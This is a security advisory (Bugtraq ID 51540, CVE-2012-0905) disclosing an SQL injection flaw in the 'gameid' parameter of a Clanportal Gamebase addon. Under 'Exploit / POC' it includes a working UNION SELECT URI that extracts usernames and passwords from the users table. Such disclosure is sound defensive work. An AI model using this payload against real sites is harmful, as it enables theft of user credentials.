BID:51540

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

Info

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

Bugtraq ID:	51540
Class:	Input Validation Error
CVE:	CVE-2012-0905
Remote:	Yes
Local:	No
Published:	Jan 18 2012 12:00AM
Updated:	Jan 24 2012 05:00PM
Credit:	Easy Laster
Vulnerable:	deV!Lz Clanportal Gamebase Addon 0

Not Vulnerable:

Discussion

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

deV!L`z Clanportal Gamebase Addon is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Exploit / POC

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/gamebase/?action=detail&gameid=1+union+select+1,2,3,4,5,nick,pwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+dzcp_users+where+id=1--+

Solution / Fix

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].

References

deV!L`z Clanportal Gamebase Addon 'gameid' Parameter SQL Injection Vulnerability

References:

deV!L`z Clanportal Gamebase Addon Project Page (ModShop)